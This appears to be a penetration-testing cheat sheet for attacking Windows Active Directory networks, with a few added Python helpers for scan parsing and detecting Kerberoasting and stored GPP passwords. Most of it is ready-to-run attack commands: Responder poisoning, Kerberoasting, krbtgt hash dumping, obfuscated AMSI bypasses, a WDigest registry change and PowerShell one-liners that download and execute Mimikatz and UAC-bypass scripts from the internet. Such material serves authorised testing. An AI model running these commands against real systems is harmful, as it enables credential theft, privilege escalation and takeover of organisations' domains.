Pentest Book
Internal Pentest

Scan

Host && Port Scanning

  • -n flag to decrease scan time by avoiding DNS resolution.
  • -f fragments packets for FW evasion; if there is no FW/IDS, remove it.
  • Also check FW evasion
```bash
# Ping discovery, Top 20, fragment packets, no DNS resolution
sudo nmap -v --top-ports 20 X.X.X.0/24 -f -n --open -oA <output_prefix>
# Ping discovery, Top 200, fragment packets, no DNS resolution, service version
sudo nmap -v --top-ports 200 X.X.X.0/24 -f -n -sV --open -oA <output_prefix>
# Top 1000, fragment packets, no DNS resolution, service version, treat all hosts as alive (skip ping)
sudo nmap -v --top-ports 1000 X.X.X.0/24 -f -n -sV -Pn --open -oA <output_prefix>
```

Web detection

```bash
# httpx
cat ip.txt | httpx -silent -random-agent -status-code -timeout 15 -title -web-server -tech-detect -o httpx.txt
cat ip.txt | httpx -silent -ports <UNCOMMON.PORTS> -random-agent -status-code -timeout 15 -title -web-server -tech-detect -o httpx_uncommon.txt
```
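To turn the -oA output of the scans above into the ip.txt and the uncommon-port list that the httpx commands expect, here is an added Python helper (not part of the original page, nor of nmap or httpx) that parses the .gnmap file; the sample scan output and the default-port set are constructed assumptions.

```python
import re

# Constructed sample of the .gnmap file that `nmap ... -oA <prefix>` writes; not real scan output.
SAMPLE_GNMAP = """\
# Nmap 7.93 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -v --top-ports 20 10.10.10.0/24 -f -n --open -oA scan
Host: 10.10.10.5 ()\tStatus: Up
Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1/, 80/open/tcp//http//nginx 1.18.0/\tIgnored State: closed (18)
Host: 10.10.10.9 ()\tStatus: Up
Host: 10.10.10.9 ()\tPorts: 445/open/tcp//microsoft-ds///, 8443/open|filtered/tcp//https-alt///\tIgnored State: filtered (18)
# Nmap done at Mon Jan  1 10:01:00 2024 -- 256 IP addresses (2 hosts up) scanned in 60.00 seconds
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")


def parse_gnmap(text):
    """Return {ip: [(port, proto, service, version), ...]} for ports nmap reports as 'open'."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # '# Nmap ...' header and footer lines
        ports = hosts.setdefault(m.group(1), [])  # a 'Status: Up' line registers the host
        for field in line.split("\t")[1:]:
            if not field.startswith("Ports: "):
                continue
            for entry in field[len("Ports: "):].split(", "):
                # each entry is port/state/proto/owner/service/rpc/version/
                p = entry.split("/")
                if p[1] == "open":  # 'open|filtered' is unconfirmed, so it is left out
                    ports.append((int(p[0]), p[2], p[4], p[6]))
    return hosts


def httpx_inputs(hosts, default_ports=(80, 443, 8080, 8443)):
    """Inputs for the web detection step: the ip.txt list and the open TCP ports outside
    default_ports (an assumed set) to pass as httpx -ports, so no found port goes unprobed."""
    ips = sorted(ip for ip, ports in hosts.items() if ports)
    uncommon = sorted({port for ports in hosts.values()
                       for port, proto, _, _ in ports
                       if proto == "tcp" and port not in default_ports})
    return ips, uncommon


if __name__ == "__main__":
    found = parse_gnmap(SAMPLE_GNMAP)
    ips, uncommon = httpx_inputs(found)
    print("\n".join(ips))                          # contents for ip.txt
    print("-ports", ",".join(map(str, uncommon)))  # value for httpx -ports
```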

Enum

Check AD section too

AD no credentials

```bash
# Detect SMB on network
responder-RunFinger -i X.X.X.0/24

# Find DC
nslookup -q=srv _ldap._tcp.dc._msdcs.<domain.name>
nslookup -type=srv _ldap._tcp.<domain.name> | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g'

# Enumerate DC
ldapsearch -h <DC.IP> -x -s base namingcontexts

# Check for null session; if you get users, go for ASREPRoast with GetNPUsers
ldapsearch -h <DC.IP> -x -b "DC=XX,DC=XX"

# Get hashes of users with Kerberos pre-auth disabled
GetNPUsers.py [Domain Name]/ -dc-ip [Domain Controller IP address] -request
GetNPUsers.py 'DC.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.10

# Get domain name
crackmapexec smb 10.10.10.10
smbmap -H 10.10.10.10 -u '' -p ''

# Get Users List
GetADUsers.py DC.local/ -dc-ip 10.10.10.10 -debug

# Get Users from ldap
windapsearch -U --full --dc-ip 10.10.10.10

# Get base domain
ldapsearch -x -h 10.10.10.175 -s base namingcontexts

# Get more info from DC
ldapsearch -x -h 10.10.10.10 -b 'DC=DCNAME,DC=LOCAL'
```

AD with credentials

  • Enum AD AIO
```bash
# https://github.com/CasperGN/ActiveDirectoryEnumeration
python3 -m ade --dc <domain.name> -u <user@domain.name> --help
# https://github.com/adrecon/ADRecon from Windows on Domain
```
  • windapsearch
```bash
# https://github.com/ropnop/go-windapsearch
windapsearch -d <domain>.<name> -u <user> -p <password> --help
```
  • ldap
```bash
# Domain users
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(&(objectClass=user)(objectCategory=person))" name sAMAccountName userPrincipalName memberOf primaryGroupID adminCount userAccountControl description servicePrincipalName objectSid pwdLastSet lastLogon -E pr=1000/noprompt | tee domain_users.txt

# Domain computers
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=computer)" name dNSHostname memberOf operatingSystem operatingSystemVersion lastLogonTimestamp servicePrincipalName description userAccountControl | tee domain_computers.txt

# Domain groups
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=group)" name sAMAccountName memberOf member description objectSid | tee domain_groups.txt
```
  • rpcclient
```bash
rpcclient -U "DOMAIN/username%password" "<domaincontroller name or IP>" -c dsr_enumtrustdom
rpcclient -U "DOMAIN/username%password" "<domaincontroller name or IP>" -c enumdomains
rpcclient -U "DOMAIN/username%password" "<domaincontroller name or IP>" -c enumdomusers
rpcclient -U "DOMAIN/username%password" "<domaincontroller name or IP>" -c enumdomgroups
rpcclient -U "DOMAIN/username%password" "<domaincontroller name or IP>" -c getdompwinfo
```
  • cme
```bash
# Run commands

# PS
cme smb <IP> -u <USER> -p '<PASS>' -X 'Get-Host'
# CMD
cme smb <IP> -u <USER> -p '<PASS>' -x whoami
# PTH
cme smb <IP> -u <USER> -H <NTHASH> -x whoami
# Other methods
cme smb <IP> -u <USER> -p '<PASS>' --exec-method {mmcexec,smbexec,atexec,wmiexec}

# Dumps

# SAM
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sam
# LSASS
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --lsa
# Sessions
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sessions
# Logged users
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --loggedon-users
# Disks
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --disks
# Users
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --users
# Groups
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --groups
# Local groups
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --local-groups
# Password policy
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --pass-pol
```

Attacks

LLMNR & NBT-NS Poisoning (Responder)

  • Find privileged user creds to reuse on other hosts
  • Set SMB and HTTP to Off in /usr/share/responder/Responder.conf
```bash
responder -I ppp0 -A # Only listen
responder -I ppp0 -rv exec bash # Poison
```
  • MultiRelay reuses the hashes captured from a specific host while Responder is running
```bash
MultiRelay.py -t X.X.X.X -u ALL
```

Kerberos

```bash
# Kerberoasting (hashcat 13100)
GetUserSPNs.py -request -save -dc-ip <IP> domain/user # hashcat 13100

# Brute force
kerbrute.py -d <DC.LOCAL> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

# ASREPRoast (hashcat 18200)
GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# PTH/PTK
# Request ticket
getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
getTGT.py <domain_name>/<user_name>:[password]
# Set ticket
export KRB5CCNAME=<TGT_ccache_file>
# Use it
psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
psexec.py -hashes 'hash' -dc-ip 10.10.10.10 <user_name>@<remote_hostname>
smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```
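The two hashcat modes named above (13100 and 18200) both crack RC4-HMAC (etype 0x17) ticket material, and that is what makes these requests stand out in a domain controller's 4768/4769 events. The following Python is an added example, not from the original page, that applies that logic to constructed sample events (field names follow the Security log event XML; the event data is made up):

```python
from collections import defaultdict

RC4_HMAC = "0x17"  # etype 23: the only ticket type hashcat 13100 (TGS-REP) and 18200 (AS-REP) crack

# Constructed sample of DC Security log events 4768 (TGT) and 4769 (service ticket); field names
# follow the event XML (TargetUserName, ServiceName, TicketEncryptionType, PreAuthType, IpAddress).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jdoe@DC.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "jdoe@DC.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "jdoe@DC.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "WS01$@DC.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.20"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.21"},
]


def kerberoast_suspects(events, min_services=3):
    """(account, source IP, SPN accounts) for requesters of RC4 service tickets to
    >= min_services distinct user accounts. Machine accounts ('$') and krbtgt are skipped:
    their keys are long and random, so those tickets are not what GetUserSPNs.py is after."""
    seen = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        seen[(e["TargetUserName"], e["IpAddress"])].add(svc)
    return sorted((user, ip, sorted(s)) for (user, ip), s in seen.items() if len(s) >= min_services)


def asrep_roast_suspects(events):
    """TGTs issued with no pre-authentication (PreAuthType 0) and RC4 encryption:
    the AS-REP roast fingerprint, i.e. what GetNPUsers.py leaves behind on the DC."""
    return sorted((e["TargetUserName"], e["IpAddress"]) for e in events
                  if e["EventID"] == 4768 and e.get("PreAuthType") == "0"
                  and e["TicketEncryptionType"] == RC4_HMAC)


if __name__ == "__main__":
    for user, ip, spns in kerberoast_suspects(SAMPLE_EVENTS):
        print(f"possible Kerberoasting: {user} from {ip} requested {len(spns)} SPNs: {spns}")
    for user, ip in asrep_roast_suspects(SAMPLE_EVENTS):
        print(f"possible AS-REP roast: TGT for {user} without pre-auth, requested from {ip}")
```

The min_services threshold is a tuning assumption; a single RC4 ticket is normal for legacy services, a burst across many SPNs from one source is not.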

Dumps

```bash
# User hash
secretsdump.py '<DC.NAME>/<User>@<DC.IP>' -just-dc-user user1

# krbtgt hash dump -> Golden Ticket
secretsdump.py '<DC.NAME>/<User>@<DC.IP>' -just-dc-user krbtgt
```

AMSI Bypass

```powershell
# Basic
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Obfuscation
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

# Other bypass
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
```

Common Exploits

PrivEsc

Local Privilege Escalation

```
# Juicy Potato - Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation
# Works only up to Windows Server 2016 and Windows 10 before build 1803
https://github.com/ohpe/juicy-potato
https://github.com/TsukiCTF/Lovely-Potato

# PrintSpoofer - Exploits the PrinterBug for System Impersonation
# Works for Windows Server 2019 and Windows 10
https://github.com/itm4n/PrintSpoofer

# RoguePotato - From Service Account to System
# Works for Windows Server 2019 and Windows 10
https://github.com/antonioCoco/RoguePotato

# Abusing Token Privileges
# https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/

# SMBGhost CVE-2020-0796
https://github.com/danigargu/CVE-2020-0796

# CVE-2021-36934 (HiveNightmare/SeriousSAM)
https://github.com/cube0x0/CVE-2021-36934
```

Extra

Oneliners

```powershell
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"

# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
# Same from cmd.exe: findstr /S cpassword %logonserver%\sysvol\*.xml

# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe

# Insert reg key to enable Wdigest on newer versions of Windows (restart needed)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
```
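For the SYSVOL cpassword check above, here is an added Python audit (not from the original page) that parses the Group Policy Preferences XML properly instead of grepping, reports which accounts still carry a cpassword attribute, and never decrypts it; the Groups.xml sample and its cpassword value are constructed.

```python
import os
import xml.etree.ElementTree as ET

# Constructed Groups.xml in the Group Policy Preferences layout; the cpassword value is a
# made-up placeholder, not a real encrypted password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin" changed="2015-04-10 08:26:21">
    <Properties action="U" userName="LocalAdmin" cpassword="CONSTRUCTED_PLACEHOLDER_VALUE" newName=""/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Helpdesk" changed="2016-01-02 09:00:00">
    <Properties action="U" userName="Helpdesk" newName=""/>
  </User>
</Groups>
"""


def find_cpassword(xml_data, path):
    """Every element in one preference file that carries a cpassword attribute.
    The value itself is not returned: the finding is 'delete the preference and rotate'."""
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")  # let expat honour the file's own encoding declaration
    try:
        root = ET.fromstring(xml_data)
    except ET.ParseError:
        return []  # not well-formed XML; findstr would have skipped it silently as well
    return [{"file": path, "element": elem.tag,
             "account": elem.attrib.get("userName", ""), "action": elem.attrib.get("action", "")}
            for elem in root.iter() if "cpassword" in elem.attrib]


def audit_sysvol(root_dir):
    """Walk a SYSVOL share (or an offline copy of it) and collect every cpassword finding."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name.lower().endswith(".xml"):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    findings.extend(find_cpassword(fh.read(), full))
    return findings


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:  # stand-in for \\<dc>\SYSVOL\<domain>
        gpp_dir = os.path.join(tmp, "Policies", "{GUID}", "Machine", "Preferences", "Groups")
        os.makedirs(gpp_dir)
        with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        for f in audit_sysvol(tmp):
            print(f"{f['file']}: <{f['element']}> for '{f['account']}' still stores a cpassword")
```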

Native commands

```powershell
# User Domain
$env:USERDNSDOMAIN
(Get-ADDomain).DNSRoot

# User Domain info
Get-ADUser Anakin

# Computer Domain
(Get-WmiObject Win32_ComputerSystem).Domain

# DNS, NetBIOSName, DomainSID
Get-ADDomain | select DNSRoot,NetBIOSName,DomainSID

# Trusted domains
nltest /domain_trusts

# Forest info
Get-ADForest

# Interesting users
Get-ADUser -Filter * | select SamAccountName

# Computer accounts
Get-ADObject -LDAPFilter "objectClass=User" -Properties SamAccountName | select SamAccountName

# Trust accounts
Get-ADUser -LDAPFilter "(SamAccountName=*$)" | select SamAccountName

# Groups
Get-ADGroup -Filter * | select SamAccountName

# Interesting groups
Get-ADGroup "Domain Admins" -Properties members,memberof

# Get DC names
nltest /dclist:<domain.name>

# Get all users in the current domain
Get-NetUser | select -ExpandProperty cn

# Get all computers in the current domain
Get-NetComputer

# Get all domains in current forest
Get-NetForestDomain

# Get domain/forest trusts
Get-NetDomainTrust
Get-NetForestTrust

# Get information for the DA group
Get-NetGroup -GroupName "Domain Admins"

# Find members of the DA group
Get-NetGroupMember -GroupName "Domain Admins" | select -ExpandProperty membername

# Find interesting shares in the domain, ignore default shares
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC

# Get OUs for current domain
Get-NetOU -FullData

# Get computers in an OU
# %{} is a looping statement
Get-NetOU -OUName StudentMachines | %{Get-NetComputer -ADSPath $_}

# Get GPOs applied to a specific OU
Get-NetOU *student* | select gplink
Get-NetGPO -Name "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}"

# Get Restricted Groups set via GPOs, look for interesting group memberships forced via domain
Get-NetGPOGroup

# Get incoming ACL for a specific object
Get-ObjectACL -SamAccountName "Domain Admins" -ResolveGUIDs | Select IdentityReference,ActiveDirectoryRights

# Find interesting ACLs for the entire domain, show in a readable (left-to-right) format
Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft

# Get interesting outgoing ACLs for a specific user or group
# ?{} is a filter statement
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "Domain Admins"} | select ObjectDN,ActiveDirectoryRights

# Get Applocker Policy
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

# Get computers running LAPS, along with their passwords if we're allowed to read those
Get-LAPSComputers

# Get groups allowed to read LAPS passwords
Find-LAPSDelegatedGroups
```